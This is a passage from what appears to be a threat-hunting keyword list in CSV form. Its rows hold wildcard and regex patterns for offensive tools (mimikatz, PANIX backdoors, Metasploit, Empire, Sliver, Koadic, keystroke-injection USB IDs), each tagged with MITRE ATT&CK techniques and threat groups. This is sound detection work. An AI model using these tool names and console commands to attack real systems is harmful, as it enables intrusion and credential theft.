Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61951" "*Uploading malicious SCNotification.exe.config via SMB*",".{0,1000}Uploading\smalicious\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","61952" "*Uploading mimikatz binary*",".{0,1000}Uploading\smimikatz\sbinary.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","61954" "*uploading mstscax proxy dll to *",".{0,1000}uploading\smstscax\sproxy\sdll\sto\s.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","0","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","61955" "*upx --brute *.exe*",".{0,1000}upx\s\-\-brute\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","61956" "*upx -ultra-brute 
*.exe*",".{0,1000}upx\s\-ultra\-brute\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","61957" "*UrbanBishop.exe*",".{0,1000}UrbanBishop\.exe.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","61958" "*Uri3n/Thread-Pool-Injection-PoC*",".{0,1000}Uri3n\/Thread\-Pool\-Injection\-PoC.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","1","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","61959" "*URL must be provided for GIF embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sGIF\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61960" "*URL must be provided for PNG embedding!*",".{0,1000}URL\smust\sbe\sprovided\sfor\sPNG\sembedding!.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","N/A","10","6","534","62","2025-03-10T07:32:22Z","2024-01-10T08:04:57Z","61961" "*url: 'forwarding_link/post.php',*",".{0,1000}url\:\s\'forwarding_link\/post\.php\',.{0,1000}","offensive_tool_keyword","saycheese","Grab target's webcam shots by link","T1213 - T1071 - T1102 - T1123 - T1185 - T1200","TA0001 - TA0005 - TA0009 - TA0011","N/A","N/A","Phishing","https://github.com/hangetzzu/saycheese","1","0","N/A","N/A","9","10","1175","962","2024-06-18T23:39:41Z","2019-04-29T04:07:00Z","61962" "*ursnif_IcedID.profile*",".{0,1000}ursnif_IcedID\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","61963" "*us.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}us\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","61964" "*usage_backdoor_user*",".{0,1000}usage_backdoor_user.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61965" "*usage_initd_backdoor*",".{0,1000}usage_initd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61966" "*usage_malicious_docker_container*",".{0,1000}usage_malicious_docker_container.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61967" "*usage_malicious_package*",".{0,1000}usage_malicious_package.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61968" "*usage_motd_backdoor*",".{0,1000}usage_motd_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61969" "*usage_package_manager_persistence*",".{0,1000}usage_package_manager_persistence.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61970" "*usage_rc_local_backdoor*",".{0,1000}usage_rc_local_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61971" "*usage_sudoers_backdoor*",".{0,1000}usage_sudoers_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61972" "*usage_suid_backdoor*",".{0,1000}usage_suid_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61973" "*usage_system_binary_backdoor*",".{0,1000}usage_system_binary_backdoor.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","61974" "*USB\VID_0B95&PID_772A\90CEA2*",".{0,1000}USB\\VID_0B95&PID_772A\\90CEA2.{0,1000}","offensive_tool_keyword","Hak5 Wifi Pineapple","rogue access point suite for advanced man-in-the-middle attacks","T1071 - T1078 - T1200","TA0001 - TA0009 - TA0006","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61975" "*USB\VID_0BDA&PID_8152\00E04C361BDE*",".{0,1000}USB\\VID_0BDA&PID_8152\\00E04C361BDE.{0,1000}","offensive_tool_keyword","Hak5 Lan turtle","ethernet extension device providing remote Access and MITM capabilities","T1071 - T1090 - T1040","TA0005 - TA0009 - TA0003","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61976" "*USB\VID_0BDA&PID_8152\00E04C3659E9*",".{0,1000}USB\\VID_0BDA&PID_8152\\00E04C3659E9.{0,1000}","offensive_tool_keyword","Hak5 Lan turtle","ethernet extension device providing remote Access and MITM capabilities","T1071 - T1090 - T1040","TA0005 - TA0009 - 
TA0003","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61977" "*USB\VID_10C4\&PID_EA60*",".{0,1000}USB\\VID_10C4\\&PID_EA60.{0,1000}","offensive_tool_keyword","Hak5 O.MG Cable","USB cable with an advanced implant hidden inside","T1056 - T1090","TA0005 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61978" "*USB\VID_16D0&PID_0753*",".{0,1000}USB\\VID_16D0&PID_0753.{0,1000}","offensive_tool_keyword","Digispark Attiny85","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61979" "*USB\VID_18D1&PID_4EE7\KYLIN*",".{0,1000}USB\\VID_18D1&PID_4EE7\\KYLIN.{0,1000}","offensive_tool_keyword","Hak5 Screen Crab","stealthy video man-in-the-middle HDMI implant","T1071 - T1123 - T1560","TA0005 - TA0010 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61980" "*USB\VID_1915&PID_520C&MI_00\6&20A3E423*",".{0,1000}USB\\VID_1915&PID_520C&MI_00\\6&20A3E423.{0,1000}","offensive_tool_keyword","Nordic NRF52840","Logitech Unifying impersonator - used for keystroke injections","T1056 - T1078","TA0001 - TA0002","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 
6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61981" "*USB\VID_1B4F&PID_9208*",".{0,1000}USB\\VID_1B4F&PID_9208.{0,1000}","offensive_tool_keyword","Cactus WHID","advanced keystroke injection device","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61982" "*USB\VID_2341&PID_8037*",".{0,1000}USB\\VID_2341&PID_8037.{0,1000}","offensive_tool_keyword","Arduino Pro Micro","keystroke injection tool","T1056 - T1204","TA0001 - TA0009","N/A","N/A","Hardware","https://github.com/mthcht/awesome-lists/blob/main/Lists/suspicious_usb_ids_list.csv","1","0","#deviceid","can appear in windows eventid 6416","10","10","936","111","2025-04-22T21:16:31Z","2022-12-11T10:45:11Z","61983" "*USBPcap*",".{0,1000}USBPcap.{0,1000}","offensive_tool_keyword","usbpcap","USB capture for Windows.","T1115 - T1129 - T1052","TA0003 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/s-h-3-l-l/katoolin3","1","0","N/A","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","61984" "*use command/file_basic_upload.json*",".{0,1000}use\scommand\/file_basic_upload\.json.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61985" "*use exploit/*",".{0,1000}use\sexploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61986" "*use exploit/windows/*",".{0,1000}use\sexploit\/windows\/.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61987" "*use implant/*",".{0,1000}use\simplant\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61988" "*use incognito*",".{0,1000}use\sincognito.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","61989" "*use interactive/command_prompt.json*",".{0,1000}use\sinteractive\/command_prompt\.json.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","61990" "*Use nmap --script http-ntlm-info *",".{0,1000}Use\snmap\s\-\-script\shttp\-ntlm\-info\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61993" "*use powershell_stageless*",".{0,1000}use\spowershell_stageless.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","61994" "*use safetykatz*",".{0,1000}use\ssafetykatz.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","61995" "*use scanner/smb/smb_enum_gpp*",".{0,1000}use\sscanner\/smb\/smb_enum_gpp.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61996" "*use scanner/ssh/ssh_enumusers*",".{0,1000}use\sscanner\/ssh\/ssh_enumusers.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","61997" "*use stager/*",".{0,1000}use\sstager\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","61998" "*UseBeaconCmd*",".{0,1000}UseBeaconCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","62001" "*uselistener dbx*",".{0,1000}uselistener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - 
T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","62002" "*uselistener onedrive*",".{0,1000}uselistener\sonedrive.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 
